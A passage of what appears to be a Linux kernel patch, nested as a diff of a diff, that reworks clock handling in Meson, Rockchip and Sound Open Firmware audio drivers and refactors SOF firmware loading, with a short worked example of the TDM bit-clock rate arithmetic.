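	 * released automatically on unbind or probe failure. */
	struct clk *pclk = devm_clk_get_enabled(dev, "pclk");

	if (IS_ERR(pclk))
		return dev_err_probe(dev, PTR_ERR(pclk),
				     "Can't get the pclk\n");
	return 0;
}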
+diff --git a/sound/soc/meson/aiu.h b/sound/soc/meson/aiu.h
+index 393b6c2307e49..0f94c8bf60818 100644
+--- a/sound/soc/meson/aiu.h
++++ b/sound/soc/meson/aiu.h
+@@ -33,7 +33,6 @@ struct aiu_platform_data {
+ };
+ 
+ struct aiu {
+-	struct clk *pclk;
+ 	struct clk *spdif_mclk;
+ 	struct aiu_interface i2s;
+ 	struct aiu_interface spdif;
+diff --git a/sound/soc/meson/axg-tdm-interface.c b/sound/soc/meson/axg-tdm-interface.c
+index c040c83637e02..028383f949efd 100644
+--- a/sound/soc/meson/axg-tdm-interface.c
++++ b/sound/soc/meson/axg-tdm-interface.c
+@@ -12,6 +12,9 @@
+ 
+ #include "axg-tdm.h"
+ 
++/* Maximum bit clock frequency according to the datasheets */
++#define MAX_SCLK 100000000 /* Hz */
++
+ enum {
+ 	TDM_IFACE_PAD,
+ 	TDM_IFACE_LOOPBACK,
+@@ -155,19 +158,27 @@ static int axg_tdm_iface_startup(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
+-	/* Apply component wide rate symmetry */
+ 	if (snd_soc_component_active(dai->component)) {
++		/* Apply component wide rate symmetry */
+ 		ret = snd_pcm_hw_constraint_single(substream->runtime,
+ 						   SNDRV_PCM_HW_PARAM_RATE,
+ 						   iface->rate);
+-		if (ret < 0) {
+-			dev_err(dai->dev,
+-				"can't set iface rate constraint\n");
+-			return ret;
+-		}
++
++	} else {
++		/* Limit rate according to the slot number and width */
++		unsigned int max_rate =
++			MAX_SCLK / (iface->slots * iface->slot_width);
++		ret = snd_pcm_hw_constraint_minmax(substream->runtime,
++						   SNDRV_PCM_HW_PARAM_RATE,
++						   0, max_rate);
+ 	}
+ 
+-	return 0;
++	if (ret < 0)
++		dev_err(dai->dev, "can't set iface rate constraint\n");
++	else
++		ret = 0;
++
++	return ret;
+ }
+ 
+ static int axg_tdm_iface_set_stream(struct snd_pcm_substream *substream,
+@@ -266,8 +277,8 @@ static int axg_tdm_iface_set_sclk(struct snd_soc_dai *dai,
+ 	srate = iface->slots * iface->slot_width * params_rate(params);
+ 
+ 	if (!iface->mclk_rate) {
+-		/* If no specific mclk is requested, default to bit clock * 4 */
+-		clk_set_rate(iface->mclk, 4 * srate);
++		/* If no specific mclk is requested, default to bit clock * 2 */
++		clk_set_rate(iface->mclk, 2 * srate);
+ 	} else {
+ 		/* Check if we can actually get the bit clock from mclk */
+ 		if (iface->mclk_rate % srate) {
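The arithmetic behind the new constraint above: one frame carries
slots * slot_width bit clock cycles, so sclk = rate * slots * slot_width
and the highest permissible rate is MAX_SCLK / (slots * slot_width); the
default mclk is now twice the bit clock. A standalone check of the
numbers (values illustrative):

#include <stdio.h>

#define MAX_SCLK 100000000 /* Hz, the datasheet limit named above */

int main(void)
{
	unsigned int slots = 8, slot_width = 32, rate = 48000;
	unsigned int sclk = slots * slot_width * rate;
	unsigned int max_rate = MAX_SCLK / (slots * slot_width);

	printf("sclk         = %u Hz\n", sclk);      /* 12288000 */
	printf("max rate     = %u Hz\n", max_rate);  /* 390625   */
	printf("default mclk = %u Hz\n", 2 * sclk);  /* 24576000 */
	return 0;
}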
+diff --git a/sound/soc/meson/t9015.c b/sound/soc/meson/t9015.c
+index 9c6b4dac68932..571f65788c592 100644
+--- a/sound/soc/meson/t9015.c
++++ b/sound/soc/meson/t9015.c
+@@ -48,7 +48,6 @@
+ #define POWER_CFG	0x10
+ 
+ struct t9015 {
+-	struct clk *pclk;
+ 	struct regulator *avdd;
+ };
+ 
+@@ -249,6 +248,7 @@ static int t9015_probe(struct platform_device *pdev)
+ 	struct t9015 *priv;
+ 	void __iomem *regs;
+ 	struct regmap *regmap;
++	struct clk *pclk;
+ 	int ret;
+ 
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+@@ -256,26 +256,14 @@ static int t9015_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 	platform_set_drvdata(pdev, priv);
+ 
+-	priv->pclk = devm_clk_get(dev, "pclk");
+-	if (IS_ERR(priv->pclk))
+-		return dev_err_probe(dev, PTR_ERR(priv->pclk), "failed to get core clock\n");
++	pclk = devm_clk_get_enabled(dev, "pclk");
++	if (IS_ERR(pclk))
++		return dev_err_probe(dev, PTR_ERR(pclk), "failed to get core clock\n");
+ 
+ 	priv->avdd = devm_regulator_get(dev, "AVDD");
+ 	if (IS_ERR(priv->avdd))
+ 		return dev_err_probe(dev, PTR_ERR(priv->avdd), "failed to AVDD\n");
+ 
+-	ret = clk_prepare_enable(priv->pclk);
+-	if (ret) {
+-		dev_err(dev, "core clock enable failed\n");
+-		return ret;
+-	}
+-
+-	ret = devm_add_action_or_reset(dev,
+-			(void(*)(void *))clk_disable_unprepare,
+-			priv->pclk);
+-	if (ret)
+-		return ret;
+-
+ 	ret = device_reset(dev);
+ 	if (ret) {
+ 		dev_err(dev, "reset failed\n");
+diff --git a/sound/soc/rockchip/rockchip_i2s_tdm.c b/sound/soc/rockchip/rockchip_i2s_tdm.c
+index 2550bd2a5e78c..2e36a97077b99 100644
+--- a/sound/soc/rockchip/rockchip_i2s_tdm.c
++++ b/sound/soc/rockchip/rockchip_i2s_tdm.c
+@@ -27,8 +27,6 @@
+ #define DEFAULT_MCLK_FS				256
+ #define CH_GRP_MAX				4  /* The max channel 8 / 2 */
+ #define MULTIPLEX_CH_MAX			10
+-#define CLK_PPM_MIN				-1000
+-#define CLK_PPM_MAX				1000
+ 
+ #define TRCM_TXRX 0
+ #define TRCM_TX 1
+@@ -55,20 +53,6 @@ struct rk_i2s_tdm_dev {
+ 	struct clk *hclk;
+ 	struct clk *mclk_tx;
+ 	struct clk *mclk_rx;
+-	/* The mclk_tx_src is parent of mclk_tx */
+-	struct clk *mclk_tx_src;
+-	/* The mclk_rx_src is parent of mclk_rx */
+-	struct clk *mclk_rx_src;
+-	/*
+-	 * The mclk_root0 and mclk_root1 are root parent and supplies for
+-	 * the different FS.
+-	 *
+-	 * e.g:
+-	 * mclk_root0 is VPLL0, used for FS=48000Hz
+-	 * mclk_root1 is VPLL1, used for FS=44100Hz
+-	 */
+-	struct clk *mclk_root0;
+-	struct clk *mclk_root1;
+ 	struct regmap *regmap;
+ 	struct regmap *grf;
+ 	struct snd_dmaengine_dai_dma_data capture_dma_data;
+@@ -78,19 +62,11 @@ struct rk_i2s_tdm_dev {
+ 	struct rk_i2s_soc_data *soc_data;
+ 	bool is_master_mode;
+ 	bool io_multiplex;
+-	bool mclk_calibrate;
+ 	bool tdm_mode;
+-	unsigned int mclk_rx_freq;
+-	unsigned int mclk_tx_freq;
+-	unsigned int mclk_root0_freq;
+-	unsigned int mclk_root1_freq;
+-	unsigned int mclk_root0_initial_freq;
+-	unsigned int mclk_root1_initial_freq;
+ 	unsigned int frame_width;
+ 	unsigned int clk_trcm;
+ 	unsigned int i2s_sdis[CH_GRP_MAX];
+ 	unsigned int i2s_sdos[CH_GRP_MAX];
+-	int clk_ppm;
+ 	int refcount;
+ 	spinlock_t lock; /* xfer lock */
+ 	bool has_playback;
+@@ -116,12 +92,6 @@ static void i2s_tdm_disable_unprepare_mclk(struct rk_i2s_tdm_dev *i2s_tdm)
+ {
+ 	clk_disable_unprepare(i2s_tdm->mclk_tx);
+ 	clk_disable_unprepare(i2s_tdm->mclk_rx);
+-	if (i2s_tdm->mclk_calibrate) {
+-		clk_disable_unprepare(i2s_tdm->mclk_tx_src);
+-		clk_disable_unprepare(i2s_tdm->mclk_rx_src);
+-		clk_disable_unprepare(i2s_tdm->mclk_root0);
+-		clk_disable_unprepare(i2s_tdm->mclk_root1);
+-	}
+ }
+ 
+ /**
+@@ -144,29 +114,9 @@ static int i2s_tdm_prepare_enable_mclk(struct rk_i2s_tdm_dev *i2s_tdm)
+ 	ret = clk_prepare_enable(i2s_tdm->mclk_rx);
+ 	if (ret)
+ 		goto err_mclk_rx;
+-	if (i2s_tdm->mclk_calibrate) {
+-		ret = clk_prepare_enable(i2s_tdm->mclk_tx_src);
+-		if (ret)
+-			goto err_mclk_rx;
+-		ret = clk_prepare_enable(i2s_tdm->mclk_rx_src);
+-		if (ret)
+-			goto err_mclk_rx_src;
+-		ret = clk_prepare_enable(i2s_tdm->mclk_root0);
+-		if (ret)
+-			goto err_mclk_root0;
+-		ret = clk_prepare_enable(i2s_tdm->mclk_root1);
+-		if (ret)
+-			goto err_mclk_root1;
+-	}
+ 
+ 	return 0;
+ 
+-err_mclk_root1:
+-	clk_disable_unprepare(i2s_tdm->mclk_root0);
+-err_mclk_root0:
+-	clk_disable_unprepare(i2s_tdm->mclk_rx_src);
+-err_mclk_rx_src:
+-	clk_disable_unprepare(i2s_tdm->mclk_tx_src);
+ err_mclk_rx:
+ 	clk_disable_unprepare(i2s_tdm->mclk_tx);
+ err_mclk_tx:
+@@ -566,159 +516,6 @@ static void rockchip_i2s_tdm_xfer_resume(struct snd_pcm_substream *substream,
+ 			   I2S_XFER_RXS_START);
+ }
+ 
+-static int rockchip_i2s_tdm_clk_set_rate(struct rk_i2s_tdm_dev *i2s_tdm,
+-					 struct clk *clk, unsigned long rate,
+-					 int ppm)
+-{
+-	unsigned long rate_target;
+-	int delta, ret;
+-
+-	if (ppm == i2s_tdm->clk_ppm)
+-		return 0;
+-
+-	if (ppm < 0)
+-		delta = -1;
+-	else
+-		delta = 1;
+-
+-	delta *= (int)div64_u64((u64)rate * (u64)abs(ppm) + 500000,
+-				1000000);
+-
+-	rate_target = rate + delta;
+-
+-	if (!rate_target)
+-		return -EINVAL;
+-
+-	ret = clk_set_rate(clk, rate_target);
+-	if (ret)
+-		return ret;
+-
+-	i2s_tdm->clk_ppm = ppm;
+-
+-	return 0;
+-}
+-
+-static int rockchip_i2s_tdm_calibrate_mclk(struct rk_i2s_tdm_dev *i2s_tdm,
+-					   struct snd_pcm_substream *substream,
+-					   unsigned int lrck_freq)
+-{
+-	struct clk *mclk_root;
+-	struct clk *mclk_parent;
+-	unsigned int mclk_root_freq;
+-	unsigned int mclk_root_initial_freq;
+-	unsigned int mclk_parent_freq;
+-	unsigned int div, delta;
+-	u64 ppm;
+-	int ret;
+-
+-	if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
+-		mclk_parent = i2s_tdm->mclk_tx_src;
+-	else
+-		mclk_parent = i2s_tdm->mclk_rx_src;
+-
+-	switch (lrck_freq) {
+-	case 8000:
+-	case 16000:
+-	case 24000:
+-	case 32000:
+-	case 48000:
+-	case 64000:
+-	case 96000:
+-	case 192000:
+-		mclk_root = i2s_tdm->mclk_root0;
+-		mclk_root_freq = i2s_tdm->mclk_root0_freq;
+-		mclk_root_initial_freq = i2s_tdm->mclk_root0_initial_freq;
+-		mclk_parent_freq = DEFAULT_MCLK_FS * 192000;
+-		break;
+-	case 11025:
+-	case 22050:
+-	case 44100:
+-	case 88200:
+-	case 176400:
+-		mclk_root = i2s_tdm->mclk_root1;
+-		mclk_root_freq = i2s_tdm->mclk_root1_freq;
+-		mclk_root_initial_freq = i2s_tdm->mclk_root1_initial_freq;
+-		mclk_parent_freq = DEFAULT_MCLK_FS * 176400;
+-		break;
+-	default:
+-		dev_err(i2s_tdm->dev, "Invalid LRCK frequency: %u Hz\n",
+-			lrck_freq);
+-		return -EINVAL;
+-	}
+-
+-	ret = clk_set_parent(mclk_parent, mclk_root);
+-	if (ret)
+-		return ret;
+-
+-	ret = rockchip_i2s_tdm_clk_set_rate(i2s_tdm, mclk_root,
+-					    mclk_root_freq, 0);
+-	if (ret)
+-		return ret;
+-
+-	delta = abs(mclk_root_freq % mclk_parent_freq - mclk_parent_freq);
+-	ppm = div64_u64((uint64_t)delta * 1000000, (uint64_t)mclk_root_freq);
+-
+-	if (ppm) {
+-		div = DIV_ROUND_CLOSEST(mclk_root_initial_freq, mclk_parent_freq);
+-		if (!div)
+-			return -EINVAL;
+-
+-		mclk_root_freq = mclk_parent_freq * round_up(div, 2);
+-
+-		ret = clk_set_rate(mclk_root, mclk_root_freq);
+-		if (ret)
+-			return ret;
+-
+-		i2s_tdm->mclk_root0_freq = clk_get_rate(i2s_tdm->mclk_root0);
+-		i2s_tdm->mclk_root1_freq = clk_get_rate(i2s_tdm->mclk_root1);
+-	}
+-
+-	return clk_set_rate(mclk_parent, mclk_parent_freq);
+-}
+-
+-static int rockchip_i2s_tdm_set_mclk(struct rk_i2s_tdm_dev *i2s_tdm,
+-				     struct snd_pcm_substream *substream,
+-				     struct clk **mclk)
+-{
+-	unsigned int mclk_freq;
+-	int ret;
+-
+-	if (i2s_tdm->clk_trcm) {
+-		if (i2s_tdm->mclk_tx_freq != i2s_tdm->mclk_rx_freq) {
+-			dev_err(i2s_tdm->dev,
+-				"clk_trcm, tx: %d and rx: %d should be the same\n",
+-				i2s_tdm->mclk_tx_freq,
+-				i2s_tdm->mclk_rx_freq);
+-			return -EINVAL;
+-		}
+-
+-		ret = clk_set_rate(i2s_tdm->mclk_tx, i2s_tdm->mclk_tx_freq);
+-		if (ret)
+-			return ret;
+-
+-		ret = clk_set_rate(i2s_tdm->mclk_rx, i2s_tdm->mclk_rx_freq);
+-		if (ret)
+-			return ret;
+-
+-		/* mclk_rx is also ok. */
+-		*mclk = i2s_tdm->mclk_tx;
+-	} else {
+-		if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) {
+-			*mclk = i2s_tdm->mclk_tx;
+-			mclk_freq = i2s_tdm->mclk_tx_freq;
+-		} else {
+-			*mclk = i2s_tdm->mclk_rx;
+-			mclk_freq = i2s_tdm->mclk_rx_freq;
+-		}
+-
+-		ret = clk_set_rate(*mclk, mclk_freq);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+ static int rockchip_i2s_ch_to_io(unsigned int ch, bool substream_capture)
+ {
+ 	if (substream_capture) {
+@@ -849,19 +646,17 @@ static int rockchip_i2s_tdm_hw_params(struct snd_pcm_substream *substream,
+ 				      struct snd_soc_dai *dai)
+ {
+ 	struct rk_i2s_tdm_dev *i2s_tdm = to_info(dai);
+-	struct clk *mclk;
+-	int ret = 0;
+ 	unsigned int val = 0;
+ 	unsigned int mclk_rate, bclk_rate, div_bclk = 4, div_lrck = 64;
++	int err;
+ 
+ 	if (i2s_tdm->is_master_mode) {
+-		if (i2s_tdm->mclk_calibrate)
+-			rockchip_i2s_tdm_calibrate_mclk(i2s_tdm, substream,
+-							params_rate(params));
++		struct clk *mclk = (substream->stream == SNDRV_PCM_STREAM_PLAYBACK) ?
++			i2s_tdm->mclk_tx : i2s_tdm->mclk_rx;
+ 
+-		ret = rockchip_i2s_tdm_set_mclk(i2s_tdm, substream, &mclk);
+-		if (ret)
+-			return ret;
++		err = clk_set_rate(mclk, DEFAULT_MCLK_FS * params_rate(params));
++		if (err)
++			return err;
+ 
+ 		mclk_rate = clk_get_rate(mclk);
+ 		bclk_rate = i2s_tdm->frame_width * params_rate(params);
+@@ -969,96 +764,6 @@ static int rockchip_i2s_tdm_trigger(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ 
+-static int rockchip_i2s_tdm_set_sysclk(struct snd_soc_dai *cpu_dai, int stream,
+-				       unsigned int freq, int dir)
+-{
+-	struct rk_i2s_tdm_dev *i2s_tdm = to_info(cpu_dai);
+-
+-	/* Put set mclk rate into rockchip_i2s_tdm_set_mclk() */
+-	if (i2s_tdm->clk_trcm) {
+-		i2s_tdm->mclk_tx_freq = freq;
+-		i2s_tdm->mclk_rx_freq = freq;
+-	} else {
+-		if (stream == SNDRV_PCM_STREAM_PLAYBACK)
+-			i2s_tdm->mclk_tx_freq = freq;
+-		else
+-			i2s_tdm->mclk_rx_freq = freq;
+-	}
+-
+-	dev_dbg(i2s_tdm->dev, "The target mclk_%s freq is: %d\n",
+-		stream ? "rx" : "tx", freq);
+-
+-	return 0;
+-}
+-
+-static int rockchip_i2s_tdm_clk_compensation_info(struct snd_kcontrol *kcontrol,
+-						  struct snd_ctl_elem_info *uinfo)
+-{
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
+-	uinfo->count = 1;
+-	uinfo->value.integer.min = CLK_PPM_MIN;
+-	uinfo->value.integer.max = CLK_PPM_MAX;
+-	uinfo->value.integer.step = 1;
+-
+-	return 0;
+-}
+-
+-static int rockchip_i2s_tdm_clk_compensation_get(struct snd_kcontrol *kcontrol,
+-						 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct snd_soc_dai *dai = snd_kcontrol_chip(kcontrol);
+-	struct rk_i2s_tdm_dev *i2s_tdm = snd_soc_dai_get_drvdata(dai);
+-
+-	ucontrol->value.integer.value[0] = i2s_tdm->clk_ppm;
+-
+-	return 0;
+-}
+-
+-static int rockchip_i2s_tdm_clk_compensation_put(struct snd_kcontrol *kcontrol,
+-						 struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct snd_soc_dai *dai = snd_kcontrol_chip(kcontrol);
+-	struct rk_i2s_tdm_dev *i2s_tdm = snd_soc_dai_get_drvdata(dai);
+-	int ret = 0, ppm = 0;
+-	int changed = 0;
+-	unsigned long old_rate;
+-
+-	if (ucontrol->value.integer.value[0] < CLK_PPM_MIN ||
+-	    ucontrol->value.integer.value[0] > CLK_PPM_MAX)
+-		return -EINVAL;
+-
+-	ppm = ucontrol->value.integer.value[0];
+-
+-	old_rate = clk_get_rate(i2s_tdm->mclk_root0);
+-	ret = rockchip_i2s_tdm_clk_set_rate(i2s_tdm, i2s_tdm->mclk_root0,
+-					    i2s_tdm->mclk_root0_freq, ppm);
+-	if (ret)
+-		return ret;
+-	if (old_rate != clk_get_rate(i2s_tdm->mclk_root0))
+-		changed = 1;
+-
+-	if (clk_is_match(i2s_tdm->mclk_root0, i2s_tdm->mclk_root1))
+-		return changed;
+-
+-	old_rate = clk_get_rate(i2s_tdm->mclk_root1);
+-	ret = rockchip_i2s_tdm_clk_set_rate(i2s_tdm, i2s_tdm->mclk_root1,
+-					    i2s_tdm->mclk_root1_freq, ppm);
+-	if (ret)
+-		return ret;
+-	if (old_rate != clk_get_rate(i2s_tdm->mclk_root1))
+-		changed = 1;
+-
+-	return changed;
+-}
+-
+-static struct snd_kcontrol_new rockchip_i2s_tdm_compensation_control = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_PCM,
+-	.name = "PCM Clock Compensation in PPM",
+-	.info = rockchip_i2s_tdm_clk_compensation_info,
+-	.get = rockchip_i2s_tdm_clk_compensation_get,
+-	.put = rockchip_i2s_tdm_clk_compensation_put,
+-};
+-
+ static int rockchip_i2s_tdm_dai_probe(struct snd_soc_dai *dai)
+ {
+ 	struct rk_i2s_tdm_dev *i2s_tdm = snd_soc_dai_get_drvdata(dai);
+@@ -1068,9 +773,6 @@ static int rockchip_i2s_tdm_dai_probe(struct snd_soc_dai *dai)
+ 	if (i2s_tdm->has_playback)
+ 		dai->playback_dma_data = &i2s_tdm->playback_dma_data;
+ 
+-	if (i2s_tdm->mclk_calibrate)
+-		snd_soc_add_dai_controls(dai, &rockchip_i2s_tdm_compensation_control, 1);
+-
+ 	return 0;
+ }
+ 
+@@ -1110,7 +812,6 @@ static int rockchip_i2s_tdm_set_bclk_ratio(struct snd_soc_dai *dai,
+ static const struct snd_soc_dai_ops rockchip_i2s_tdm_dai_ops = {
+ 	.hw_params = rockchip_i2s_tdm_hw_params,
+ 	.set_bclk_ratio	= rockchip_i2s_tdm_set_bclk_ratio,
+-	.set_sysclk = rockchip_i2s_tdm_set_sysclk,
+ 	.set_fmt = rockchip_i2s_tdm_set_fmt,
+ 	.set_tdm_slot = rockchip_dai_tdm_slot,
+ 	.trigger = rockchip_i2s_tdm_trigger,
+@@ -1433,35 +1134,6 @@ static void rockchip_i2s_tdm_path_config(struct rk_i2s_tdm_dev *i2s_tdm,
+ 		rockchip_i2s_tdm_tx_path_config(i2s_tdm, num);
+ }
+ 
+-static int rockchip_i2s_tdm_get_calibrate_mclks(struct rk_i2s_tdm_dev *i2s_tdm)
+-{
+-	int num_mclks = 0;
+-
+-	i2s_tdm->mclk_tx_src = devm_clk_get(i2s_tdm->dev, "mclk_tx_src");
+-	if (!IS_ERR(i2s_tdm->mclk_tx_src))
+-		num_mclks++;
+-
+-	i2s_tdm->mclk_rx_src = devm_clk_get(i2s_tdm->dev, "mclk_rx_src");
+-	if (!IS_ERR(i2s_tdm->mclk_rx_src))
+-		num_mclks++;
+-
+-	i2s_tdm->mclk_root0 = devm_clk_get(i2s_tdm->dev, "mclk_root0");
+-	if (!IS_ERR(i2s_tdm->mclk_root0))
+-		num_mclks++;
+-
+-	i2s_tdm->mclk_root1 = devm_clk_get(i2s_tdm->dev, "mclk_root1");
+-	if (!IS_ERR(i2s_tdm->mclk_root1))
+-		num_mclks++;
+-
+-	if (num_mclks < 4 && num_mclks != 0)
+-		return -ENOENT;
+-
+-	if (num_mclks == 4)
+-		i2s_tdm->mclk_calibrate = 1;
+-
+-	return 0;
+-}
+-
+ static int rockchip_i2s_tdm_path_prepare(struct rk_i2s_tdm_dev *i2s_tdm,
+ 					 struct device_node *np,
+ 					 bool is_rx_path)
+@@ -1609,11 +1281,6 @@ static int rockchip_i2s_tdm_probe(struct platform_device *pdev)
+ 	i2s_tdm->io_multiplex =
+ 		of_property_read_bool(node, "rockchip,io-multiplex");
+ 
+-	ret = rockchip_i2s_tdm_get_calibrate_mclks(i2s_tdm);
+-	if (ret)
+-		return dev_err_probe(i2s_tdm->dev, ret,
+-				     "mclk-calibrate clocks missing");
+-
+ 	regs = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 	if (IS_ERR(regs)) {
+ 		return dev_err_probe(i2s_tdm->dev, PTR_ERR(regs),
+@@ -1666,13 +1333,6 @@ static int rockchip_i2s_tdm_probe(struct platform_device *pdev)
+ 		goto err_disable_hclk;
+ 	}
+ 
+-	if (i2s_tdm->mclk_calibrate) {
+-		i2s_tdm->mclk_root0_initial_freq = clk_get_rate(i2s_tdm->mclk_root0);
+-		i2s_tdm->mclk_root1_initial_freq = clk_get_rate(i2s_tdm->mclk_root1);
+-		i2s_tdm->mclk_root0_freq = i2s_tdm->mclk_root0_initial_freq;
+-		i2s_tdm->mclk_root1_freq = i2s_tdm->mclk_root1_initial_freq;
+-	}
+-
+ 	pm_runtime_enable(&pdev->dev);
+ 
+ 	regmap_update_bits(i2s_tdm->regmap, I2S_DMACR, I2S_DMACR_TDL_MASK,
+diff --git a/sound/soc/sof/ipc3-loader.c b/sound/soc/sof/ipc3-loader.c
+index bf423ca4e97bb..6e3ef06721106 100644
+--- a/sound/soc/sof/ipc3-loader.c
++++ b/sound/soc/sof/ipc3-loader.c
+@@ -138,8 +138,7 @@ static ssize_t ipc3_fw_ext_man_size(struct snd_sof_dev *sdev, const struct firmw
+ 
+ static size_t sof_ipc3_fw_parse_ext_man(struct snd_sof_dev *sdev)
+ {
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+-	const struct firmware *fw = plat_data->fw;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	const struct sof_ext_man_elem_header *elem_hdr;
+ 	const struct sof_ext_man_header *head;
+ 	ssize_t ext_man_size;
+@@ -149,6 +148,8 @@ static size_t sof_ipc3_fw_parse_ext_man(struct snd_sof_dev *sdev)
+ 
+ 	head = (struct sof_ext_man_header *)fw->data;
+ 	remaining = head->full_size - head->header_size;
++	if (remaining < 0 || remaining > sdev->basefw.fw->size)
++		return -EINVAL;
+ 	ext_man_size = ipc3_fw_ext_man_size(sdev, fw);
+ 
+ 	/* Assert firmware starts with extended manifest */
+@@ -310,18 +311,18 @@ static int sof_ipc3_parse_module_memcpy(struct snd_sof_dev *sdev,
+ 
+ static int sof_ipc3_load_fw_to_dsp(struct snd_sof_dev *sdev)
+ {
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+-	const struct firmware *fw = plat_data->fw;
++	u32 payload_offset = sdev->basefw.payload_offset;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	struct snd_sof_fw_header *header;
+ 	struct snd_sof_mod_hdr *module;
+ 	int (*load_module)(struct snd_sof_dev *sof_dev, struct snd_sof_mod_hdr *hdr);
+ 	size_t remaining;
+ 	int ret, count;
+ 
+-	if (!plat_data->fw)
++	if (!fw)
+ 		return -EINVAL;
+ 
+-	header = (struct snd_sof_fw_header *)(fw->data + plat_data->fw_offset);
++	header = (struct snd_sof_fw_header *)(fw->data + payload_offset);
+ 	load_module = sof_ops(sdev)->load_module;
+ 	if (!load_module) {
+ 		dev_dbg(sdev->dev, "Using generic module loading\n");
+@@ -331,9 +332,8 @@ static int sof_ipc3_load_fw_to_dsp(struct snd_sof_dev *sdev)
+ 	}
+ 
+ 	/* parse each module */
+-	module = (struct snd_sof_mod_hdr *)(fw->data + plat_data->fw_offset +
+-					    sizeof(*header));
+-	remaining = fw->size - sizeof(*header) - plat_data->fw_offset;
++	module = (struct snd_sof_mod_hdr *)(fw->data + payload_offset + sizeof(*header));
++	remaining = fw->size - sizeof(*header) - payload_offset;
+ 	/* check for wrap */
+ 	if (remaining > fw->size) {
+ 		dev_err(sdev->dev, "%s: fw size smaller than header size\n", __func__);
+@@ -374,19 +374,19 @@ static int sof_ipc3_load_fw_to_dsp(struct snd_sof_dev *sdev)
+ 
+ static int sof_ipc3_validate_firmware(struct snd_sof_dev *sdev)
+ {
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+-	const struct firmware *fw = plat_data->fw;
++	u32 payload_offset = sdev->basefw.payload_offset;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	struct snd_sof_fw_header *header;
+-	size_t fw_size = fw->size - plat_data->fw_offset;
++	size_t fw_size = fw->size - payload_offset;
+ 
+-	if (fw->size <= plat_data->fw_offset) {
++	if (fw->size <= payload_offset) {
+ 		dev_err(sdev->dev,
+ 			"firmware size must be greater than firmware offset\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* Read the header information from the data pointer */
+-	header = (struct snd_sof_fw_header *)(fw->data + plat_data->fw_offset);
++	header = (struct snd_sof_fw_header *)(fw->data + payload_offset);
+ 
+ 	/* verify FW sig */
+ 	if (strncmp(header->sig, SND_SOF_FW_SIG, SND_SOF_FW_SIG_SIZE) != 0) {
+diff --git a/sound/soc/sof/ipc4-loader.c b/sound/soc/sof/ipc4-loader.c
+index e635ae515fa9f..9f433e9b4cd37 100644
+--- a/sound/soc/sof/ipc4-loader.c
++++ b/sound/soc/sof/ipc4-loader.c
+@@ -17,9 +17,8 @@
+ static size_t sof_ipc4_fw_parse_ext_man(struct snd_sof_dev *sdev)
+ {
+ 	struct sof_ipc4_fw_data *ipc4_data = sdev->private;
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+ 	struct sof_man4_fw_binary_header *fw_header;
+-	const struct firmware *fw = plat_data->fw;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	struct sof_ext_manifest4_hdr *ext_man_hdr;
+ 	struct sof_man4_module_config *fm_config;
+ 	struct sof_ipc4_fw_module *fw_module;
+@@ -138,9 +137,8 @@ static int sof_ipc4_validate_firmware(struct snd_sof_dev *sdev)
+ {
+ 	struct sof_ipc4_fw_data *ipc4_data = sdev->private;
+ 	u32 fw_hdr_offset = ipc4_data->manifest_fw_hdr_offset;
+-	struct snd_sof_pdata *plat_data = sdev->pdata;
+ 	struct sof_man4_fw_binary_header *fw_header;
+-	const struct firmware *fw = plat_data->fw;
++	const struct firmware *fw = sdev->basefw.fw;
+ 	struct sof_ext_manifest4_hdr *ext_man_hdr;
+ 
+ 	ext_man_hdr = (struct sof_ext_manifest4_hdr *)fw->data;
+diff --git a/sound/soc/sof/loader.c b/sound/soc/sof/loader.c
+index 5f51d936b3067..ba8e3aae0a5cb 100644
+--- a/sound/soc/sof/loader.c
++++ b/sound/soc/sof/loader.c
+@@ -22,7 +22,7 @@ int snd_sof_load_firmware_raw(struct snd_sof_dev *sdev)
+ 	int ret;
+ 
+ 	/* Don't request firmware again if firmware is already requested */
+-	if (plat_data->fw)
++	if (sdev->basefw.fw)
+ 		return 0;
+ 
+ 	fw_filename = kasprintf(GFP_KERNEL, "%s/%s",
+@@ -31,7 +31,7 @@ int snd_sof_load_firmware_raw(struct snd_sof_dev *sdev)
+ 	if (!fw_filename)
+ 		return -ENOMEM;
+ 
+-	ret = request_firmware(&plat_data->fw, fw_filename, sdev->dev);
++	ret = request_firmware(&sdev->basefw.fw, fw_filename, sdev->dev);
+ 
+ 	if (ret < 0) {
+ 		dev_err(sdev->dev,
+@@ -48,7 +48,7 @@ int snd_sof_load_firmware_raw(struct snd_sof_dev *sdev)
+ 	ext_man_size = sdev->ipc->ops->fw_loader->parse_ext_manifest(sdev);
+ 	if (ext_man_size > 0) {
+ 		/* when no error occurred, drop extended manifest */
+-		plat_data->fw_offset = ext_man_size;
++		sdev->basefw.payload_offset = ext_man_size;
+ 	} else if (!ext_man_size) {
+ 		/* No extended manifest, so nothing to skip during FW load */
+ 		dev_dbg(sdev->dev, "firmware doesn't contain extended manifest\n");
+@@ -58,6 +58,12 @@ int snd_sof_load_firmware_raw(struct snd_sof_dev *sdev)
+ 			fw_filename, ret);
+ 	}
+ 
++	/*
++	 * Until the platform code is switched to use the new container the fw
++	 * and payload offset must be set in plat_data
++	 */
++	plat_data->fw = sdev->basefw.fw;
++	plat_data->fw_offset = sdev->basefw.payload_offset;
+ err:
+ 	kfree(fw_filename);
+ 
+@@ -100,7 +106,8 @@ int snd_sof_load_firmware_memcpy(struct snd_sof_dev *sdev)
+ 	return 0;
+ 
+ error:
+-	release_firmware(plat_data->fw);
